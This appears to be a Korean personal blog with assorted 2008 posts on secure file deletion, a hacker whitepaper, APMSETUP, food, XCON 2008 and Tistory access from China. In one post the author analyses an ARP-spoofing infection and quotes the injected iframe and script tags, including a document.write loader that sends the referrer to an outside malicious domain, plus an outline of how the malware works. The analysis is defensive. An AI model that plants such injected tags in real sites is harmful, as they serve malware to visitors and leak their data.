Real Geeks

윈도우 파일 삭제, 그냥 휴지통에 넣지마세요~

카테고리 없음


일반적으로 컴퓨터 파일을 삭제할 때에 Del 키 혹은 Delete 키를 이용해서 삭제 하거나

Delete 키



윈도우 메뉴에서 삭제 버튼으로 삭제를 하게 된다.

일반적인 삭제할대의 버튼



이렇게 삭제를 하게 되면, 파일이 너무나도 쉽게 바로 복구가 되어서

어떤 이유에서든 더이상 보기 싫어서 삭제한 파일들도 있을수도 있고,

목적을 달성하고 삭제하는 파일들도 있고,

중요한 파일들이나 나의 소중한 정보가 담긴파일들도 있을수 있고

몰래찍은 내 몸이나 프라이버시가 있는 사진들을 삭제 했을 수도있고,

장난으로 찍은 므흣한 동영상을 삭제 했을 수도있다.


이중 장난으로 찍은 므흣한 사진이나 동영상의 경우 유명한 사례가 있다.

홍콩의 유명 배우인 진관희의 누드사진, 섹스사진에 대한 사진이 유포된 적이 있는데

이것은 진관희가 PC에 저장도니 유명 여배우의 나체사진가 노트북 수리를 할때

노트북 수리공이 A/S 하다가 파일 복구 프로그램을 돌려서, 나온 사진들이 유포된 것으로

AS를 보내기전 사진들이나 그런걸 보안 삭제툴로 삭제를 하였으면, 절대로 복구가 안되어

그런 사진들이 유포되지 않았을 것이다.


국내에서는

http://www.youpom.co.kr/ 이라는 곳에서 영구 삭제툴을 다운로드 받을수가 있다

바로 다운로드 링크는

http://www.youpom.co.kr/download/download.php?filename=YouPomSetup.exe

이며, 무료로 충분히 사용이 가능하므로, 삭제할것이 있다면 오늘 한번 몰아서 싹 지워보는게 어떨까?

프로그램 실행하고, 무료사용 버튼 클릭하고

보안파일삭제를 클릭하고

그곳에 삭제할 파일들을 끌어다가 놓으면 리스트에 추가가 된다.

초보자들도 아주 쉽게 사용이 가능하다.



지금까지 완전 삭제를 하기 위한 방법에 대해서 소개 및 정리를 해봤습니다.

PC관리에 있어서, 개인정보를 안전하게 지키세요

앞으론 그냥 마구 삭제하지마세요~
,

보안 프로그래밍과 서버 보안등에 관한 비기가 담긴 내용

카테고리 없음

보안 프로그래밍과 서버 보안등에 관하여 해커들이 직접 기술한 내용의

백서(Whitepaper)가 있다.

제목은 와우스토리(WOWSTORY)

우리나라에서 가장 오래된 전통을 가지고 있는 와우해커라는 그룹에서 제작된 백서로

한정판 500권을 판매하고 있다.

와우스토리



어제 까지 남은수량이 60권정도 남았고, 판매된지는 한달가량 되었다.

곧 와우스토리 두번째 이야기 (와우스토리 2권)이 나온다고도 하는데

첫번째 이야기의 내용이 초보자부터 실무자까지 폭넒게 볼수있는 내용들이라서

추천할만한 책이다.

- 툴바와 관련된 BHO
- 악성코드 인코딩과 디코딩
- WHS, VBS를 이용한 악성코드
- 관리자 백도어 계정 기법과 탐지
- 리눅스 시스템 공격기법(Way of Binary Copy Without Permission)
- 보안리눅스 분석(SELinux Operations & Sources Analysis)
- 원격지 운영체제 탐지 기법 (Passive OS Fingerprint )
- PE 언패킹(PE Unpacking) 기술, 리버싱,디버깅등등의 관련된 기법들
- 중국 해커에 대한 정보들(Hackers in China)

등의 많이 접하지 못했던 내용들이 다수 수록이 되었다.

http://book.sessak.com 에 가면 목록이나 이 책을 얻을 수있는 방법들이 있고

와우스토리는

보안 해킹 연구 그룹 "와우해커 (WOWHACKER) " 에서 공급하는 백서이다.




,

우리 대한민국은 왜 다 돈.돈.돈 인가...

카테고리 없음

유해 사이트 차단 소프트웨어 디비가 필요해서 한참을 알아보고 했는데

결국. 돈이다.



돈내고 기술이전 신청하면

제품목록에올려주고..


정통부 디비를 쓸수있는것


아.. 500만원.. ㅜ.ㅜ


기술 이전 업체가 37곳이나 되내..

그리고 인증 신청하면


요따구로 된 마크준다.

열심히 하는 업체 기좀 팍팍 살려주기 위해서 이런건 국가차원으로 공개해주면 안되나...



한번 저 디비보다 더 좋게 자동수집함 해볼까나?

아니면, 돈주고 걍 저걸사느냐..

저 디비가 기본 갯수 약 30만건? 정도되는거 때매 탐나는거지..

퀄리티 때매 탐는게 절대아니므로.. 생생한놈으로 수집을 시작해봐야것다.

후우..................................


좌절.................................

돈주고 디비 산 업체들 부럽소다!!


,

사무실에서 끊여먹는 라면의 맛.. 일품!! 최고의 라면

카테고리 없음

집에 발코니에 있던 필립스 핫플레이트를 유용히 사용하기 위해

사무실로 가져옴..


핫플레이트 위에 있는 라면전용 4년된 냄비


한국인은 신라면

쉬프트웍스에서 첨으로 직접 조리해보는 라면..

후후

정말로 맛있다

 


짜파게티도 끓여먹기 일단 비벼..

 

면빨바라~ 쥑인다


짜파게티 정말 맛있어!

,

APMSETUP 리뉴얼 오픈

카테고리 없음

Apache , PHP , Mysql 을 자기 컴퓨터에서 돌릴수 있는 아주 유용한 프로그램인 APMSETUP 사이트가 새로

리뉴얼 하여 오픈하였다.



컴퓨터쪽에 관심을 많이 두거나, 웹프로그래밍이나 서버관리, 서버운영등에 대해서 관심이 많은 사람이라면

APMSETUP 이라는 프로그램에 대해서 익히 들어서 잘알거라 생각한다.

무엇보다 APMSETUP은 100% 완전 무료 소프트웨어로 대한민국의 웹프로그래밍과 웹서버 관련하여 일등공신

을 한 소프트웨어다.

이 대단하고 유용한 프로그램을 쉬프트웍스 이사님이 혼자 다만들었다. 대단해~


KLDP의 최대 다운로드에 얼마전까지만해도 2위였는데 지금 보니 4위다


프로젝트 순위 3위


최근 업데이트는 2008년 11월 10


신규 사이트의 전체 모습은 아래와 같다




(주)쉬프트웍스에서 배포하는 완전 무료 소프트웨어!!

APMSETUP

활발한 커뮤니티와 질문/답변 및 무료 공개 강좌등 전문 웹 개발자가 되기위한 필수 코스인것같다.



APMSETUP 원추!!

KLDP에서 바로 다운하기
http://kldp.net/frs/download.php/4870/APM_Setup6_2008111000.exe

상세설명이나 사용방법, 강좌등은 http://www.apmsetup.com 에서 충분히 얻을수있다.


,

ARP 스푸핑 해킹 악용 웹사이트 바이러스 삽입 피해 및 기술

카테고리 없음
ARP 스푸핑 해킹 악용 웹사이트 바이러스 삽입 피해 및 기술
(ARP Spoofing HTTP Infection Malware)

해당 서버호스팅 업체에 어서 고치라는 말을 전하고 싶은데 어딘지 모르겠다.

오늘 오후 5시경 전화가 왔다. 사이트 해킹당했다고....

지인의 서버이며, 해킹을 당했다고 하는것이다.

ARP 스푸핑 공격으로 웹사이트에 악성코드를 넣는 방법으로 생각이 된다.

소스코드를 서버 내부에서 직접 확인하니, 악성코드 관련된 iframe을 전혀 찾을수 없다.
DB에도 전혀없다.

느낌이 arp spoofing 공격인것으로 판단이 되었다

arp -a 로 arp 를 본다.
2개가 있다.






index.php 파일의 내용은 정상적이지만, 웹으로 보면 첫번째 라인에
중국 쪽에 있는 서버에 악성코드가 iframe 으로 박혀있다.

오딧세이스로 하나씩 하나씩 해서 가니까. 바로 보이는데 , 일반 웹브라우저로 보면 화면이 안보이고 악성코드가 들어가있음.




<iframe src=http://baidu-baiduxin1.cn/a0189878/[내용삭제].htm width=100 height=0></iframe>

해당 접속 경로로 가보니 아래와 같은 형상이다.

<iframe src=new.html  height=0  width=100 ></iframe>
<BR>
</BR>
<BR>
</BR>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/내용삭제.js"></script>
<script src="http://tj.baidu-6661.com/tongji/내용삭제.js"></script>
<script src=http://s75.cnzz.com/stat.php?id=내용삭제&web_id=내용삭제 language="JavaScript" charset="gb2312"></script>

또 안에 다른 내용은 아래와 같다.
var a3981sf=document.referrer;
document.write('<script src="http://tj.baidu-6661.com/tongji/vi.asp?vc='+a3981sf+'"></script>');



증상은 이렇다.

서버내에 아무리 찾아도 관련된 코드는 없다. 페이지를 바꾸려고 해도 정상적이어서 어디를 손대야할지
모른다.
그런데, 자꾸 사이트에 접속하면 바이러스가 있다고 백신에서 알려준다.
이럴때 웹사이트에는 문제가 없는것이다. ARP 스푸핑 공격으로 인한 웹사이트 변조다.
ARP 스푸핑을 악용하여 공격대상 호스트와 게이트웨이의 ARP 테이블을 감염시켜 그 중간에서
변조하는 것이다.



해외 기술 자료를 참고한 내용을 첨부






The following steps describe what occurs.

First step: The poisoned machine broadcasts ARP spoofing packets saying "I am the Gateway"

Second step: Each machine in the subnet receives an ARP spoofing packet and updates its ARP table, so the ARP cache is poisoned.

Third step: A machine accesses the Internet through the poisoned machine, then the poisoned machine routes this HTTP packet through the Gateway (the poisoned machine uses a Net driver, such as wpcap.dll or WanPacket.dll, to get network traffic).

Fourth step: The Gateway inserts a malicious URL into the HTTP response packet. Then it sends the malicious packet to the object machine.

In the following code, we see how the virus inserts a malicious link:




In the shown code above, we can see partial IP address information. The information comes from the author's network environment, which is similar to the following:

0000b3b0 255.255.255.0

subnet mask

0000b3c0 10.xx.xx.58

poisoned machine IP address

0000b840 10.xx.xx.1

correct Gateway address

0000b850 10.xx.xx.*

subnet information

When the virus obtains this data, it scans the local subnet and then sends ARP spoofing packets to machines in the local subnet.

In the code above, the virus calls a system dll file (iphlpapi.dll) to get general information about the local network adapter. The iphlpapi.dll file is a module containing the functions used by the Windows IP Helper API. When the virus gets the local network adapter information, the virus can make spoofing ARP packet. The following graphic shows detailed code


ARP spoofing virus calls several functions from the wpcap.dll, as shown here:

(1) int pcap_loop()

Collect a group of packets.

(2) int pcap_sendpacket()

Send a raw packet.

(3) int pcap_setfilter()

Associate a filter to a capture.

(4) int pcap_compile()

Compile a packet filter, converting a high-level filtering expression into a program that can be interpreted by the kernel-level filtering engine.

For additional functional details about WinPcap, please see this Web page http://www.winpcap.org/docs/docs_40_2/html/group__wpcapfunc.html.



following picture


code sample includes the malicious code

샘플 화면
,

[편의점음식 대장정 1] 떡볶이

카테고리 없음
작업하면서 개인적으로 편의점 음식을 많이 먹는다.

오늘 부터 틈틈히 먹을만한 편의점 음식을 소개해본다.

편의점에 가면 신당동 즉석 쌀떡볶이 라고 있다



조리법을 보면.. 물 50ml 를 넣고 2분30초간 돌리라고 한다.

그럼 양념이 베이지 않아서 맛대가리가 없다.

자.. 2분 더돌려보자..

조금더 먹음직스러워보인다.

근데 약간 덜익은듯?

2분더 더돌려보자..

먹음직스럽다.

맛있다..


실제로 먹을만하다. 길거리에 파는 것중에 재수없으면 맛없는 떡복이 걸리는데 그것보다는 훨맛있다.

매우니, 물 혹은 음료수 꼭 준비하길 바람..

떡볶이에는 밀키스가 잘어울린다. ㅋㅋ
,

XCON 2008 , XFUNGFOO 2008 참가 산물

카테고리 없음

2008년 11월 18~19일 XCON
2008년 11월 20~21일 XFUNGFOO

입장 태그

담아온 쇼핑백

Xcon2008

기념품 컵, 해킹컵이라고 ㅎㅎ

기념컵


책자

내용

책자..

찌끄레기들

하나 얻어온 이상한담배

감기걸리고, 먼지때매 힘들어서 Kana에게 얻은 약품들


,

중국에서 음식이 입에 맞지 않을때 식사 해결 하는 법, 북한식당

카테고리 없음
중국에 가서, 3일간 거의 아무것도 먹지 못하는 상황이 되었습니다.

그러던중....

먹을만한 음식을 발견...

바로.. 북한에서 직접 운영하는 직영 식당인 " 해당화 " 의 북경 본점이다.

3일만에 식사를 해서 더 맛있을 수도 있지만, 계속 갔었기에 해당화의 음식이 참 맛있다는 걸 알수 있었다.

북경에 북한 식당 하면, 옥류관을 떠오르는데,

옥류관은 한마디로 비싸고 맛없는 식당임.

해당화는 정말로 맛있다.

주문한 음식은 기본으로 북한 모듬김치(깍두기, 총각김치, 백김치, 배추김치)가 나오는 김치세트와

불고기(쌈싸먹는거), 그리고 평양냉면(사실 면을 먹을땐 몰랐는데 다먹고 국물을 먹는데 맛있더라)

한국에서의 냉면전문점이 훨씬 더 맛있음, 낚지볶음도 맛있고 먹을만하고,

국물류는 시레기국? 그것이 좀 먹을만하고 좋다.

해당화가 본점과 분점(왕징에 위치) 있는데, 본점을 찾아가 보길 권한다.

해당화 본점 전경


해당화 본점 실내

광고같음


모듬김치

시레기국 맛있다

불고기? 암튼 고기구워서옴

고추장맛이 일품이다

맛있다




또 가보고 싶은 해당화..
,

중국에서는 티스토리 (Tistory)에 접속할수 없다 ?

카테고리 없음
중국 출장을 다녀왔습니다. 정확하게는 비지니스의 목적이 반이고, 현지 해커 친구들과 비밀모임을 하는것이
반이 되는 목적으로 다녀왔습니다.

성과도 좋았고, 더욱더 깊은 유대관계도 쌓았고...

Xcon 행사와 Xfungfoo 행사를 하는 동안에, 바로바로 실시간으로 블로그에 포스팅을 하려고 시도했습니다

윽...

www.tistory.com은 접속이 됩니다, 하지만 사용자들의 블로그는 접속이 되지 않습니다.

당연히, 요즘 빠져있는데 테트리스 게임도 할 수가 없습니다.

TISTORY(티스토리)는 왜! 중국 접속을 차단하였는지, 야속하기만 했지요..

"내가 오늘 생각했던거, 오늘 봤던 내용들을 공유하고 싶었지만, 결국 포스팅하지 못하였다"

다시 롤백하여 기억을 더듬어가며, 포스팅을 해봐야겠음...

티스토리는 전세계의 다른 블로그들과 같이, 전세계 모든 곳에서 사용이 가능하게 해줬으면 좋겠음!!!

한게임은 접속할수 없다고 보여주지만, 티스토리는 그냥 IP대역 전체를 막아둔것으로 판단이됨

접속되지 않는 아이피



,

티스토리툴바